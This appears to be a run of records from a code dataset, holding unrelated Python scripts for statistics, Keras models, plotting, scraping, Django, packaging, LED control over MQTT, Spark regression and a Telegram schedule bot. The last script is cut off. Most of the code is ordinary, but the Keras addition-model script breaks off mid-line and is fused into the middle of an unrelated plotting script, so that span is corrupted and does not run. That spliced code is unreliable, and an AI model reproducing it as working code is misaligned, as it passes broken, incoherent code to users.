\ndata = dg.data_set # Assigns the list of random int to a variable data\n\n# from earlier\ndata_sum = 0\nfor num in data:\n # could also use `data_sum = data_sum + num`\n data_sum += num\n# this is the mean\naverage = data_sum/len(data)\n\n\nsum_squared_diff = 0\nfor num in data:\n # now calc the sum of (each number minus the mean)^2\n squared_diff = (num - average)**2\n sum_squared_diff += squared_diff\n# then, divide by len() to get the mean squared difference \nmean_squared_diff = sum_squared_diff/len(data)\nsd = mean_squared_diff**.5\n\nprint(f'The standard deviation of your data is {sd}')\n","sub_path":"P1P1/4_stddev.py","file_name":"4_stddev.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"90705864","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 18 17:24:44 2019\n\n@author: kokis\n\"\"\"\n\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.layers.core import RepeatVector\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\n \nnp.random.seed()\n\ndef n(digits=3):\n number=''\n for i in range(np.random.randint(1,digits+1)):\n number+=np.random.choice(list('0123456789'))\n \n return int(number)\n\ndef padding(chars,maxlen):\n return chars+' '*(maxlen-len(chars))\n\ndigits=3\ninput_digits=digits*2+1\noutput_digits=digits+1\n\nadded=set()\nquestions=[]\nanswers=[]\n\nN=20000\nN_train=16000\nN_validation=3200\n\nwhile len(questions)=pi] += -2*pi\n\t\tu = u/abs(u)\n\n\t\tix = argsort(a)\n\n\t\tdir_f0 = 12*log2(dir_f0[ix]/ref_f0[ix])\n\t\tdir_ser = 12*log2(dir_ser[ix]/ref_ser[ix])\n\t\tthr_f0 = thr_f0[ix]\n\t\tthr_ser = thr_ser[ix]\n\t\tse = se_thr[ix]\n\t\tthr = thr[ix]\n\t\tu = u[ix]\n\t\n\t\tfor j in range(len(dir_f0)):\n\t\t\tax.plot(thr_f0[j]+se[j]*array([-1, 1])*real(u[j]), thr_ser[j]+se[j]*array([-1, 1])*imag(u[j]), '-o', color=col, ms=4, mfc='none', mec=col*.7)\n\n\t\ts = ((dir_f0==0) & (dir_ser>0)) | ((dir_f0<0) & (dir_ser==0))\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col*.5+.5, lw=lw, dashes=(2,2))\n\n\t\ts = ((dir_f0==0) & (dir_ser<0)) | ((dir_f0>0) & (dir_ser==0))\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col*.5+.5, lw=lw, dashes=(2,2))\n\n\t\ts = (dir_f0>=0) & (dir_ser>=0)\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col, lw=lw, mec=col*.5, ms=7, marker=markers[brand])\n\n\t\ts = (dir_f0<=0) & (dir_ser<=0)\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col, lw=lw, mec=col*.5, ms=7, label=id, marker=markers[brand])\n \n\nax.legend(loc='lower left', prop={'size': 11})\nax.set_ylabel(\"1/VTL (semitones re. reference)\")\nax.set_xlabel(\"F0 (semitones re. 
reference)\")\n\nax.set_yticks(range(-14, 10, 2))\n\nxlim = ax.get_xlim()\nylim = ax.get_ylim()\ndx = xlim[1]-xlim[0]\ndy = ylim[1]-ylim[0]\ns = .4\nfig.set_size_inches(dx*s, dy*s)\nfig.savefig(\"Results_indiv.png\", dpi=200, format=\"png\")\nfig.savefig(\"Results_indiv.eps\", format=\"eps\")\n\n\n","sub_path":"Fishy_Adaptive VTL-F0 jnd/plot_results_indiv.py","file_name":"plot_results_indiv.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605600370","text":"import urllib.request as req\nimport bs4\n\nurl = 'https://netreg.isu.edu.tw/Wapp/Wap_indexmain2.asp'\n\n# 建立 Request 物件,附加 headers 資訊\nrequest = req.Request(url, headers={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\"\n})\n\nwith req.urlopen(request) as response:\n data = response.read().decode(\"utf-8\")\n\n#print(data)\n\nroot = bs4.BeautifulSoup(data, \"html.parser\")\n\nn = root.find_all(\"span\", style=\"font-size:20px;\")\n\nfor m in n:\n if m.a == None:\n print(m.string)","sub_path":"crawler-isuwork.py","file_name":"crawler-isuwork.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"116864249","text":"from django.contrib.gis.db import models\nfrom gwml2.models.general import Quantity\nfrom gwml2.models.term_measurement_parameter import TermMeasurementParameter\nfrom gwml2.models.metadata.creation import CreationMetadata\n\n\nclass Measurement(CreationMetadata):\n \"\"\" Model to hold measurement data\n \"\"\"\n\n time = models.DateTimeField(\n null=True, blank=True\n )\n parameter = models.ForeignKey(\n TermMeasurementParameter, null=True, blank=True, verbose_name='parameter',\n on_delete=models.SET_NULL\n )\n methodology = models.CharField(\n null=True, blank=True, max_length=200,\n help_text=\"Explain the methodology used to collect the data, in the field and eventually in the lab.\"\n )\n value = models.OneToOneField(\n Quantity, on_delete=models.SET_NULL,\n null=True, blank=True\n )\n\n class Meta:\n abstract = True\n","sub_path":"models/measurement.py","file_name":"measurement.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"256757093","text":"#!/usr/bin/env python3\n\nimport os\nimport setuptools\n\ninstall_requires = [\n 'empy',\n 'pexpect',\n 'packaging',\n 'pyyaml',\n 'six', # workaround for missing dependency transitive to docker\n]\n\n\nextras_require = {\n 'tests': ['codecov', 'coverage', 'nose', 'pytest'],\n 'packaging': ['stdeb', 'twine']\n}\n\n# docker API used to be in a package called `docker-py` before the 2.0 release\ndocker_package = 'docker'\ntry:\n import docker\nexcept ImportError:\n # Docker is not yet installed, pick library based on platform\n # Use old name if platform has pre-2.0 version\n if os.path.isfile('/etc/os-release'):\n with open('/etc/os-release') as fin:\n content = fin.read()\n if 'xenial' in content:\n docker_package = 'docker-py'\nelse:\n # Docker is installed, pick library based on what we found\n ver = docker.__version__.split('.')\n if int(ver[0]) < 2:\n docker_package = 'docker-py'\n\ninstall_requires.append(docker_package)\n\nkwargs = {\n 'name': 'groot_rocker',\n 'version': '0.4.1',\n 'packages': ['groot_rocker'],\n 'package_data': {'groot_rocker': ['templates/*.em']},\n 'entry_points': {\n 
'console_scripts': [\n 'groot-rocker = groot_rocker.cli:main',\n 'detect_docker_image_os = groot_rocker.cli:detect_image_os'\n ],\n 'groot_rocker.extensions': [\n 'container_name = groot_rocker.extensions:ContainerName',\n 'devices = groot_rocker.extensions:Devices',\n 'env = groot_rocker.extensions:Environment',\n 'home = groot_rocker.extensions:HomeDir',\n 'network = groot_rocker.extensions:Network',\n ]\n },\n 'author': 'Daniel Stonier',\n 'author_email': 'd.stonier@gmail.com',\n 'keywords': ['Docker'],\n 'classifiers': [\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: Apache Software License'\n ],\n 'description': 'A tool to run docker containers with customized extras',\n 'long_description': 'A tool to run docker containers with customized extra added like git gui support overlayed.',\n 'license': 'Apache License 2.0',\n 'python_requires': '>=3.0',\n\n 'install_requires': install_requires,\n 'extras_require': extras_require,\n 'url': 'https://github.com/stonier/groot_rocker'\n}\n\nsetuptools.setup(**kwargs)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"303327895","text":"lista = []\nmaior = menor = 0\nfor c in range(0,5):\n num = int(input('Digte um numero: '))\n if c == 0 or num > lista[-1]:\n lista.append(num)\n else:\n pos = 0\n while pos < len(lista):\n if num <= lista[pos]:\n lista.insert(pos, num)\n break\n pos += 1\nprint(f'Os valores digitados em ordem foram {lista}')\n\n","sub_path":"lista ordenada sem repetições.py","file_name":"lista ordenada sem repetições.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"533870184","text":"import sys\nimport os\nimport numpy as np\nsys.path.append(\"code/utils\")\nimport utils\n#command line args as follows:\nprint(\"Command line args: model image\")\n\nmodelArg = sys.argv[1]\nimgArg = sys.argv[2]\n\nfrom keras.preprocessing import image as im\nfrom keras.models import Model,load_model\nfrom keras import activations\nfrom keras.backend import image_data_format,image_dim_ordering\nfrom keras.applications.inception_v3 import InceptionV3\n\n#For testing\nsys.path.append(\"code\")\nimport FTMC_InceptionV3_v3\nimport FTMC_InceptionV3_v4\nimport FTMC_Xception_v3\nimport FTMC_Xception_v4\n\n# oldmodel=load_model(modelArg)\n# # print(oldmodel.summary())\n# # print(image_data_format())\n# # print(image_dim_ordering())\n# # print(oldmodel.inputs)\n# # print(oldmodel.layers[0])\n# # print(type(oldmodel.layers[0]))\n# # layer_idx = -1 \n# #\n# #\n# #model = FTMC_InceptionV3_v3.FTMC_InceptionV3_v3().model\n# model = FTMC_Xception_v3.FTMC_Xception_v3().model\n#\n# assert len(oldmodel.layers) == len(model.layers)\n#\n# for idx,layer in enumerate(oldmodel.layers):\n# assert type(oldmodel.layers[idx]) == type(model.layers[idx])\n# model.layers[idx].set_weights(layer.get_weights())\n# #\n# # print('##############new model#############')\n# # print(model.summary())\n# # print(image_data_format())\n# # print(image_dim_ordering())\n# # print(model.inputs)\n# # print(model.layers[0])\n# # print(type(model.layers[0]))\n# #\n# from keras.optimizers import SGD\n# model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss='categorical_crossentropy')\n# model.save(modelArg+\"FIX\")\nmodel=load_model(modelArg)\n\n# input_shape = (299, 299, 3)\n#model = 
InceptionV3(input_shape=input_shape, weights='imagenet', include_top=True) \n\n\n#TODO:\n## setting input_shape on model initialisation is absolutely required for keras-vis\n## not sure why figuring this out might be interesting for contributing to keras-vis :-)\n## workaround instantiate new identical model as the trained model\n## iterate over the layers of both the trained and new model\n# newmodellayer.set_weights(oldmodellayer.get_weights)\n# do initially with Inceptionv3_v3 \n# use a model-file-naming -> class mapping\n\nfrom vis.utils import utils as vizut\n# Swap softmax with linear\nlayer_idx=-1\nmodel.layers[layer_idx].activation = activations.linear\nmodel = vizut.apply_modifications(model)\n\nfrom matplotlib import pyplot as plt\nfrom skimage import io, transform\n#%matplotlib inline\nplt.rcParams['figure.figsize'] = (18, 6)\n\n#img1 = vizut.load_img('ouzel.jpg', target_size=(299, 299))\n#img2 = vizut.load_img(\"tench2.jpg\", target_size=(299, 299))\n#img1 = vizut.load_img('B2split_0_Val/1_Spanklem/IMG_20170904_142748285.jpg', target_size=(299, 299))\nimg1 = vizut.load_img('B2split_2_Val/3_VleugelMoerOpleg_Rond/P1090190.JPG', target_size=(299, 299))\nimg2 = vizut.load_img(\"B2split_2_Val/4.0_Variable_Spanklem_Kort/P1090420.JPG\", target_size=(299, 299))\n#img2 = vizut.load_img(\"B2split_0_Val/1_Spanklem/IMG_20170904_154745119.jpg\", target_size=(299, 299))\n#img2 = vizut.load_img('ouzel.jpg', target_size=(299, 299))\n\n# print(vizut.get_img_shape(img1))\n# f, ax = plt.subplots(2, 2)\n# ax[0][0].imshow(img1)\n# ax[0][1].imshow(img1)\n# ax[1][0].imshow(img2)\n# ax[1][1].imshow(img2)\n# plt.show()\n\n\n\nfrom vis.visualization import visualize_saliency, overlay\nfrom vis.utils import utils\nfrom keras import activations\n\n# Utility to search for layer index by name. \n# Alternatively we can specify this as -1 since it corresponds to the last layer.\n#final_layer_idx = utils.find_final_layer_idx(model, 'predictions')\nfinal_layer_idx = -1 \n\nfilter_index=3\n\nf, ax = plt.subplots(2, 2)\nfor i, img in enumerate([img1, img2]): \n # 20 is the imagenet index corresponding to `ouzel`\n grads = visualize_saliency(model, final_layer_idx, filter_indices=filter_index, seed_input=img)\n\n # visualize grads as heatmap\n ax[i][0].imshow(img)\n ax[i][1].imshow(grads, cmap='jet')\nplt.show()\n\nfor modifier in ['guided', 'relu']:\n f, ax = plt.subplots(2, 2)\n for i, img in enumerate([img1, img2]): \n plt.suptitle(modifier)\n # 0 i assume should be the filter index for spanklem1.0\n grads = visualize_saliency(model, final_layer_idx, filter_indices=filter_index, seed_input=img, backprop_modifier=modifier)\n ax[i][0].imshow(img)\n ax[i][1].imshow(grads, cmap='jet')\n plt.show()\n\nimport numpy as np\nimport matplotlib.cm as cm\nfrom vis.visualization import visualize_cam\nfrom vis.visualization import overlay\nlayer_idx = -1 \n\n#plt.figure()\nfor modifier in [None, 'guided', 'relu']:\n f, ax = plt.subplots(2, 2)\n plt.suptitle(\"vanilla\" if modifier is None else modifier)\n for i, img in enumerate([img1, img2]): \n grads = visualize_cam(model, layer_idx, filter_indices=filter_index, seed_input=img, backprop_modifier=modifier) \n print(grads)\n print(grads.shape)\n # Lets overlay the heatmap onto original image. 
\n #jet_heatmap = np.uint8(cm.jet(grads) * 255)[:, : , :, 0]\n cmjet=cm.jet(grads)\n print(cmjet)\n print(cmjet.shape)\n print(\"HELI\")\n cmheli=cm.cubehelix(grads)\n print(cmheli)\n print(cmheli.shape)\n # print(cmjet[0][0][0])\n # print(cmjet[0][0][1])\n print(\"[..., :3]\")\n print(cmjet[..., :3])\n print(cmjet[..., :3].shape)\n print(\"[:,:,:,:3]\")\n print(cmjet[:,:,:,:3])\n print(cmjet[:,:,:,:3].shape)\n jet_heatmap = np.uint8(cm.jet(grads)[..., :3] * 255)\n print(jet_heatmap)\n print(jet_heatmap.shape)\n print(img.shape)\n ax[i][0].imshow(img)\n ax[i][1].imshow(grads, cmap='jet')\n #ax[i].imshow(overlay(jet_heatmap, img))\n #ax[i][1].imshow(overlay(jet_heatmap, img))\n plt.show()\n","sub_path":"grad-cam.py","file_name":"grad-cam.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"434276573","text":"from django.conf.urls import url\nimport views\n\nurlpatterns = [\n url(r'^export/profile', views.export_profile,\n name=\"profiles_export_profile\"),\n url(r'^export/user', views.export_user,\n name=\"profiles_export_user\"),\n url(r'^export/contact', views.export_contact,\n name=\"profiles_export_contact\"),\n]\n","sub_path":"sample/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"278670200","text":"#!/usr/bin/env python3\n\n# LED imports\nimport time\nfrom rpi_ws281x import *\nimport argparse\n\n#MQTT imports\nimport paho.mqtt.client as mqtt\n\n# LED strip configuration:\nLED_COUNT = 300 # Number of LED pixels.\nLED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).\n#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n# --------------------------------------------LED Functions---------------------------------------------------------------------\n\ndef colorWipe(strip, color, wait_ms=50):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, color)\n strip.show()\n time.sleep(wait_ms/1000.0)\n\n\n# def blend(strip, firstColor, secondColor, wait_ms=50):\n# \"\"\"Blends color from one firstColor to secondColor\"\"\"\n# colorOne = firstColor\n# colorTwo = secondColor\n# blend = list(colorOne.range_to(colorTwo), LED_COUNT)\n# i = 0\n# for color in blend:\n# strip.setPixelColor(i, color)\n# strip.show()\n# i += 1\n# time.sleep(wait_ms/1000)\n\ndef fire(strip, wait_ms=50):\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, Color(255, i % 256, 0))\n strip.show()\n time.sleep(wait_ms/1000.0)\n\n\ndef theaterChase(strip, color, wait_ms=50, iterations=10):\n \"\"\"Movie theater light style chaser animation.\"\"\"\n for j in range(iterations):\n for q in range(3):\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, color)\n strip.show()\n time.sleep(wait_ms/1000.0)\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, 0)\n\ndef wheel(pos):\n \"\"\"Generate rainbow colors across 0-255 positions.\"\"\"\n if pos < 85:\n return Color(pos * 3, 255 - pos * 3, 0)\n elif pos < 
170:\n pos -= 85\n return Color(255 - pos * 3, 0, pos * 3)\n else:\n pos -= 170\n return Color(0, pos * 3, 255 - pos * 3)\n\ndef rainbow(strip, wait_ms=20, iterations=1):\n \"\"\"Draw rainbow that fades across all pixels at once.\"\"\"\n for j in range(256*iterations):\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, wheel((i+j) & 255))\n strip.show()\n time.sleep(wait_ms/1000.0)\n\ndef rainbowCycle(strip, wait_ms=20, iterations=5):\n \"\"\"Draw rainbow that uniformly distributes itself across all pixels.\"\"\"\n for j in range(256*iterations):\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255))\n strip.show()\n time.sleep(wait_ms/1000.0)\n\ndef theaterChaseRainbow(strip, wait_ms=50):\n \"\"\"Rainbow movie theater light style chaser animation.\"\"\"\n for j in range(256):\n for q in range(3):\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, wheel((i+j) % 255))\n strip.show()\n time.sleep(wait_ms/1000.0)\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, 0)\n\n\n# --------------------------------------------Subscriber Functions---------------------------------------------------------------------\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with rc: \" + str(rc))\n client.subscribe(\"codomo/led\")\n\ndef on_message(client, userdata, message):\n load = str(message.payload)\n if \"red\" in load:\n print(\"Red message received. Turning LED to red\")\n colorWipe(strip, Color(255, 0, 0))\n return\n\n if \"green\" in load:\n print(\"Green message received. Turning LED to Green\")\n colorWipe(strip, Color(0, 255, 0))\n return\n \n if \"blue\" in load:\n print(\"Blue message received. Turning LED to Blue\")\n colorWipe(strip, Color(0, 0, 255))\n return\n \n if \"theaterChase\" in load:\n print(\"TheaterChase message received. Turning LED to theater chase\")\n theaterChase(strip, Color(127, 127, 127)) # White theater chase\n theaterChase(strip, Color(127, 0, 0)) # Red theater chase\n theaterChase(strip, Color( 0, 0, 127)) # Blue theater chase\n return\n\n if \"rainbow\" in load:\n print(\"Rainbow message received. 
Turning LED to Rainbow\")\n rainbow(strip)\n return\n\n if \"theatherChaseRainbow\" in load:\n print(\"Theatre Chase Rainbow mode activated\")\n theaterChaseRainbow(strip)\n return\n\n if \"fire\" in load:\n print(\"Let the flames of ragnarok descend upon us!\")\n fire(strip)\n\n#----------------------------------------------LED Setup------------------------------------------------------------------------\nstrip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\nstrip.begin()\n\n#----------------------------------------------MQTT Setup------------------------------------------------------------------------\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"192.168.0.119\", 1883, 60)\ncolorWipe(strip, Color(255, 255, 255))\n\nclient.loop_forever()\n","sub_path":"python/examples/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"629096903","text":"from pyspark.conf import SparkConf\nfrom pyspark.context import SparkContext\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\n\nfrom pyspark.mllib.regression import LabeledPoint\nfrom pyspark.mllib.tree import DecisionTree\nfrom pyspark.mllib.evaluation import RegressionMetrics\nimport pandas as pd\n\ndef pd_read():\n df_hour = pd.read_csv('/usr/local/Cellar/apache-spark/3.0.0/libexec/sources/hour.csv')\n print(df_hour.loc[0:4])\n return df_hour.keys()\n\ndef data_propossessing(sc):\n day_data = sc.textFile('/usr/local/Cellar/apache-spark/3.0.0/libexec/sources/day.csv')\n hour_data = sc.textFile('/usr/local/Cellar/apache-spark/3.0.0/libexec/sources/hour.csv')\n R_hour_RDD = hour_data.map(lambda x:x.split(','))\n header = R_hour_RDD.first()\n R_hour_RDD_cor = R_hour_RDD.filter(lambda line:line != header)\n print(R_hour_RDD_cor.take(3))\n exist_ls = [num for num in range(17)]\n for item in [0,1,3,14,15]:\n exist_ls.remove(item)\n data_stage1 = R_hour_RDD_cor.map(lambda tp:[tp[item] for item in exist_ls])\n print('informaiton data remains:',data_stage1.take(3))\n data_stage2 = data_stage1.map(lambda tp:LabeledPoint(\n label=float(tp[-1]),\n features=[float(item) for item in tp[0:len(tp)-1]]\n ))\n print('labeled data:',data_stage2.take(3))\n return data_stage2\n\ndef data_spliting(rdd):\n trainData,testData = rdd.randomSplit([8,2])\n print(trainData.count(),testData.count())\n return trainData,testData\n\ndef model_and_prediction(trainData,testData):\n maxDepthlist = [3,5,10,15,20,25]\n maxBinslist = [3,5,10,50,100,200]\n model_selection_dict = {}\n for num_i in range(0,6,1):\n for num_j in range(0,6,1):\n model_choice = DecisionTree.trainRegressor(data=trainData,\n categoricalFeaturesInfo={},\n impurity='variance',\n maxDepth=maxDepthlist[num_i],\n maxBins=maxBinslist[num_j])\n test_features = testData.map(lambda tp:tp.features)\n pred_result = model_choice.predict(test_features)\n flatten = pred_result.zip(testData.map(lambda tp:tp.label))\n metrics = RegressionMetrics(flatten)\n RMSE = metrics.rootMeanSquaredError\n print(f'model based on maxDepth={maxDepthlist[num_i]} and maxBins={maxBinslist[num_j]}:',RMSE)\n model_selection_dict[(num_i,num_j)] = RMSE\n best_result = 200\n for pair in model_selection_dict.items():\n if pair[1] < best_result:\n best_result = pair[1]\n _num_i = list(model_selection_dict.keys())[list(model_selection_dict.values()).index(best_result)][0]\n _num_j = 
list(model_selection_dict.keys())[list(model_selection_dict.values()).index(best_result)][1]\n best_model_string = 'The best model parameters come as:' \\\n + f'maxDepth={maxDepthlist[_num_i]}, maxBins={maxBinslist[_num_j]} -- ' \\\n + f'MSE={best_result}'\n return best_model_string\n\nif __name__ == '__main__':\n # spark = SparkSession \\\n # .builder \\\n # .appName('spark_regression') \\\n # .getOrCreate()\n # sc = spark.sparkContext\n conf = SparkConf().setAppName('spark_regression')\n sc1 = SparkContext(conf=conf)\n # print(pd_read())\n data_labeled = data_propossessing(sc=sc1)\n trainData, testData = data_spliting(data_labeled)\n best_model_string = model_and_prediction(trainData=trainData,testData=testData)\n print(best_model_string)","sub_path":"spark_MLlib/spark_regression.py","file_name":"spark_regression.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"321807048","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\nN, M = map(int, input().split())\n\nnumbers = [num for num in range(1, N + 1)]\n\nall_seq = []\nfor i in range(N):\n q = [[numbers[i]]]\n\n while q:\n seq = q.pop(0)\n\n if len(seq) == M:\n all_seq.append(seq)\n else:\n for num in numbers:\n if num > seq[-1] and num not in seq:\n new_seq = seq + [num]\n q.append(new_seq)\n\nfor seq in all_seq:\n print(\"{}\".format(' '.join(map(str, seq))))\n","sub_path":"PYTHON/BAEKJOON/15650_N과_M_2/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269029406","text":"\nimport logging\nimport datetime\nimport time\nimport os\nimport csv\nimport glob\n\nfrom texts import *\n\nos.environ['TZ'] = 'Europe/Moscow'\ntime.tzset()\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n\ndef format_date(datetime):\n return datetime.strftime(\"%Y.%m.%d\")\n\n\ndef format_datetime(datetime):\n return datetime.strftime(\"%Y.%m.%d %H:%M\")\n\n\ndef parse_time(time_string):\n return datetime.datetime.strptime(time_string, \"%H:%M\").time()\n\n\ndef parse_datetime(datetime_string):\n return datetime.datetime.strptime(datetime_string, \"%Y.%m.%d %H:%M\")\n\n\ndef scene_name(file_name):\n return file_name.split(\"-\")[2][:-4].strip()\n\n\ndef format_artist(time, artist):\n return time.strftime(\"%H:%M - \" + artist)\n\n\ndef test_suite():\n report = \"\"\n\n time = datetime.datetime(2018, 5, 25, 18, 00)\n expected = no_event_text\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 11, 00)\n expected = starting_soon_text + \"\"\"\n\nbeta stage:\n16:00 - Galich\n\ngamma stage:\n22:00 - Eye Que b2b naya\n\nomega stage:\n22:00 - Lluck\n\"\"\"\n\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 15, 00)\n # same expected value\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 16, 00)\n expected = playing_now_text + \"\"\"\n\nbeta stage:\n16:00 - Galich\n17:30 - ArkadyAir\n\ngamma stage:\n22:00 - Eye Que b2b naya\n\nomega stage:\n22:00 - Lluck\n\"\"\"\n\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 16, 5)\n # same expected value\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 8, 40)\n expected = playing_now_text + \"\"\"\n\nbeta stage:\n08:30 - Anrilov b2b Bvoice\n12:00 - окончание\n\ngamma stage:\n07:00 - Kobba\n09:00 - 
окончание\n\nomega stage:\n07:30 - Lena Popova\n09:00 - Cultkitchen\n\"\"\"\n\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 9, 10)\n expected = playing_now_text + \"\"\"\n\nbeta stage:\n08:30 - Anrilov b2b Bvoice\n12:00 - окончание\n\nomega stage:\n09:00 - Cultkitchen\n12:00 - окончание\n\"\"\"\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 12, 00)\n # same expected value\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 12, 20)\n expected = over_text + \"\\n\"\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 19, 20)\n # same expected value\n report += test_case(time, expected)\n\n return report\n\n\ndef test_case(time, expected):\n report = time.strftime(\"\\n\\n%Y.%m.%d %H:%M:\\n\")\n actual = playing_at(time)\n if actual == expected:\n report += \"Test passed\\n\\n\" + actual\n else:\n report += \"Test failed\\n\\nActual result:\\n\" + actual + \"\\nExpected result:\\n\" + expected\n print(actual)\n print(expected)\n import difflib\n expected = expected.splitlines(1)\n actual = actual.splitlines(1)\n diff = difflib.unified_diff(expected, actual)\n print(''.join(diff))\n\n return report\n\n\ndef test(bot, update, args):\n chat_id = update.message.chat.id\n if len(args) == 0:\n bot.sendMessage(text=test_suite(), chat_id=chat_id)\n else:\n time = ' '.join(args)\n report = \"Playing at \" + time + \"\\n\"\n report += playing_at(parse_datetime(time))\n bot.sendMessage(text=report, chat_id=chat_id)\n\n\ndef playing_at(time):\n today_string = format_date(time)\n today_files = glob.glob(\"data/*\" + today_string + \"*.csv\")\n\n yesterday = time - datetime.timedelta(days=1)\n tomorrow = time + datetime.timedelta(days=1)\n\n today_date = time.date()\n yesterday_date = yesterday.date()\n tomorrow_date = tomorrow.date()\n\n yesterday_string = format_date(yesterday)\n yesterday_files = glob.glob(\"data/*\" + yesterday_string + \"*.csv\")\n\n if len(today_files) == len(yesterday_files) == 0:\n return no_event_text\n\n schedule = {}\n\n for file in yesterday_files:\n scene = scene_name(file)\n if not scene in schedule:\n schedule[scene] = []\n\n reached_today = False\n\n with open(file, newline='') as csvfile:\n previous_time = datetime.time(0, 0)\n scene_reader = csv.reader(csvfile)\n for row in scene_reader:\n # print(row)\n event_time = parse_time(row[0])\n event_name = row[1]\n\n if event_time < previous_time:\n reached_today = True\n\n current_date = today_date if reached_today else yesterday_date\n event_datetime = datetime.datetime.combine(current_date, event_time)\n schedule[scene].append((event_datetime, event_name))\n\n previous_time = event_time\n\n for file in today_files:\n scene = scene_name(file)\n if not scene in schedule:\n schedule[scene] = []\n\n reached_tomorrow = False\n\n with open(file, newline='') as csvfile:\n previous_time = datetime.time(0, 0)\n scene_reader = csv.reader(csvfile)\n for row in scene_reader:\n # print(row)\n event_time = parse_time(row[0])\n event_name = row[1]\n\n if event_time < previous_time:\n reached_tomorrow = True\n\n current_date = tomorrow_date if reached_tomorrow else today_date\n event_datetime = datetime.datetime.combine(current_date, event_time)\n schedule[scene].append((event_datetime, event_name))\n\n previous_time = event_time\n\n # print(schedule)\n\n\n DAY_THRESHOLD = datetime.time(14, 0)\n\n # TODO: find out dynamically\n STAGES_ORDER = [\"MAIN\", \"SANCTUM\"]\n\n started = False\n for scene in schedule:\n if time 
